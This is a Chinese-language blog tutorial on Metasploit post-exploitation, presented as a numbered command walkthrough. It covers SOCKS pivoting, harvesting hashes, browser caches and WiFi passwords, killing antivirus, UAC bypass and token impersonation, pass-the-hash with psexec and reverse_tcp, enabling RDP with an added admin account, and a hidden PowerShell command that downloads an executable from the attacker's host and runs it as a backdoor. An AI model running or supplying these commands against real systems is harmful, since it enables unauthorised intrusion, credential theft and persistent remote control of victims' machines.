• 【kali-漏洞利用】(3.3)Metasploit后渗透(下):后渗透模块使用

    目录

    一、推荐

    二、使用

    2.1、网络命令

    Socks代理

    2.2、信息收集

    常用:

    2.3、提权

    本地提权:

    绕过UAC提权

    RunAs提权

    假冒令牌提权

    2.4、窃取hash及密码

    hashdump

    哈希传递

    2.5、RDP

    开启3389

    远程桌面

    2.6、后门植入

    Powershell后门

    一、推荐

    【kali-漏洞利用】(3.3)后渗透之Meterpreter(上):命令大全icon-default.png?t=M666https://blog.csdn.net/qq_53079406/article/details/126179710?spm=1001.2014.3001.5501

    二、使用

    2.1、网络命令

    Socks代理

    1. 前提:在目标设备添加完路由,才可以通过msf带的socks4a模块进行socks4代理转发
    2. use auxiliary/server/socks4a
    3. set srvhost 127.0.0.1
    4. set srvport 2000
    5. run
    6.  
    7. vim /etc/proxychains.conf   #在文件末尾添加socks4代理服务器

    使用proxychains代理访问执行nmap操作

    1. proxychains nmap -sV -p 445 --script=smb-vuln-ms17-010.nse IP  
    2.     #扫描永恒之蓝漏洞
    3. proxychains hydra IP rdp -l administrator -P password.txt -V   
    4.     #rdp服务暴力破解

    2.2、信息收集

    常用:

    1. run arp_scanner -r ip/24  #利用arp进行存活主机扫描
    2. run winenum               #自动化执行一些检测脚本
    3. run credcollect           #获取用户hash
    4. run domain_list_gen         #获取域管理账户列表
    5. run post/multi/gather/env   #获取用户环境变量
    6. run post/windows/gather/enum_logged_on_users -c  #列出当前登录用户
    7. run post/linux/gather/checkvm     #是否虚拟机
    8. run post/windows/gather/checkvm   #是否虚拟机
    9. run post/windows/gather/forensics/enum_drives  #查看磁盘分区信息
    10. run post/windows/gather/enum_applications      #获取安装软件信息
    11. run post/windows/gather/dumplinks   #获取最近访问过的文档、链接信息
    12. run post/windows/gather/enum_ie     #获取IE缓存
    13. run post/windows/gather/enum_firefox  #获取firefox缓存
    14. run post/windows/gather/enum_chrome   #获取Chrome缓存
    15. run post/multi/recon/local_exploit_suggester  #获取本地提权漏洞
    16. run post/windows/gather/enum_patches  #获取补丁信息
    17. run post/windows/gather/enum_domain   #查找域控
    18. run post/windows/gather/enum_snmp     #获取snmp团体名称
    19. run post/windows/gather/credentials/vnc  #获取vnc密码
    20. run post/windows/wlan/wlan_profile       #用于读取目标主机WiFi密码
    21. run post/multi/gather/wlan_geolocate     #基于wlan进行地理位置确认 文件位于/root/.msf4/loot
    22. run post/windows/manage/killav           #关闭杀毒软件

    2.3、提权

    本地提权:

    搜集补丁信息,寻找可利用exploits提权

    1. run post/windows/gather/enum_patches  #查看补丁信息
    2. background
    3. search MS10-015
    4. use exploit/windows/local/ms10_015_kitrap0d
    5. set session 8
    6. run

    绕过UAC提权

    msf内置bypassuac脚本,原理不同,使用方法类似

    执行后返回一个新的会话,再次执行getsystem即可提权

    1. exploit/windows/local/bypassuac
    2. exploit/windows/local/bypassuac_eventvwr
    3. exploit/windows/local/bypassuac_injection
    4. exploit/windows/local/bypassuac_injection_winsxs
    5. exploit/windows/local/bypassuac_silentcleanup
    6. exploit/windows/local/bypassuac_vbs

    命令getsystem提权失败,再利用bypassuac来提权

    例如exploit/windows/local/bypassuac模块(32位、64位都有效)

    1. use exploit/windows/local/bypassuac
    2. set session 1
    3. run

    RunAs提权

    利用exploit/windows/local/ask模块(32、64位),创建一个可执行文件并在目标机上发起一个提升权限请求的程序,触发系统UAC,提示用户是否进行更改,若选择“是”,拿到高权限的meterpreter shell

    1. use exploit/windows/local/ask
    2. set filename update.exe  # 设置反弹程序名称
    3. set session 1
    4. run

    前提:

    系统当前用户须在管理员组或者知道管理员的密码

    用户账户控制程序UAC设置则没有要求

    会创建一个可执行文件,该可执行文件(需进行免杀处理)的创建要使用EXE::Custom选项

    假冒令牌提权

    令牌是系统临时密钥,它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源。这些令牌将持续存在于系统中,除非系统重新启动。

    两种类型的令牌:

    一种是Delegation Tokens(授权令牌),支持交互式登录(eg:远程桌面登陆登录)

    一种是Impersonation Tokens(模拟令牌),非交互的会话(eg:访问文件共享)

    1. use incognito     #加载窃取令牌模块 
    2. list_tokens -u    #查看可用的用户令牌
    3. list_tokens -g    #查看可用的用户组令牌
    4. impersonate_token 'NT AUTHORITY\SYSTEM'  #假冒SYSTEM token
    5. rev2self          #返回原始token

    2.4、窃取hash及密码

    hashdump

    1. hashdump
    2. run post/windows/gather/smart_hashdump
    3.  
    4. #得到的hash解密即用户密码

    哈希传递

    利用hashdump得到用户的hash

    再利用psexec模块进行哈希传递攻击
    使用psexec的前提:SMB服务必须开启(开启445端口);Admin$可以访问

    1. use exploit/windows/smb/psexec
    2. set payload windows/meterpreter/reverse_tcp
    3. set LHOST 192.168.183.147
    4. set LPORT 443
    5. set RHOST 192.168.183.154
    6. set SMBUSER Administrator
    7. set SMBPASS ccf**4ee:3db**678
    8. set SMBDOMAIN  WORKGROUP   # 域用户需要设置SMBDOMAIN
    9. run

    2.5、RDP

    开启3389

    通过enable_rdp脚本将用户添加到远程桌面用户组和管理员用户组

    1. run post/windows/manage/enable_rdp   #开启远程桌面
    2. run post/windows/manage/enable_rdp USERNAME=admin PASSWORD=admin #添加用户
    3. run post/windows/manage/enable_rdp FORWARD=true LPORT=6667       #将3389端口转发到6667

    远程桌面

    1. enumdesktops  #查看可用的桌面
    2. getdesktop    #获取当前meterpreter 关联的桌面
    3. setdesktop    #设置meterpreter关联的桌面  -h查看帮助
    4. run vnc       #使用vnc远程桌面连接
    5. rdesktop 127.0.0.1:1111   #需要输入用户名密码连接
    6. rdesktop -u Administrator -p 123 127.0.0.1:1111  #-u 用户名 -p 密码

    2.6、后门植入

    Powershell后门

    1. use exploit/multi/script/web_delivery
    2. set payload windows/meterpreter/reverse_tcp
    3. set LHOST 192.168.183.147
    4. set LPORT 2334
    5. set srvport 2333
    6. set uripath /
    7. set target 5
    8. run
    9.  
    10. 在目标设备cmd上执行以下命令即可反弹
    11. powershell.exe -nop -w hidden -c $z="echo ($env:temp+'\eJedcsJE.exe')"; (new-object System.Net.WebClient).DownloadFile('http://192.168.183.147:2333/', $z); invoke-item $z

    (注:命令来源于网络)

  • 相关阅读:
    Nodejs和Node-red的关系
    信息学奥赛一本通:1408:素数回文数的个数
    算法通关村之堆结构(实战训练)经典问题:理解堆的构造、插入、删除过程,查找数组中第K大的元素、堆排序、合并K个有序链表
    LeetCode70-爬楼梯
    我与C++的爱恋:模板初阶和STL库
    解决连接MQTT时报的Connection refused: connect问题以及无权连接的问题
    学习视频剪辑:巧妙运用中画、底画,制作画中画,提升视频效果
    LeetCode46:全排列
    目标检测YOLO实战应用案例100讲-基于YOLO的道路交通标志识别
    机器学习里的信息论
  • 原文地址:https://blog.csdn.net/qq_53079406/article/details/126186008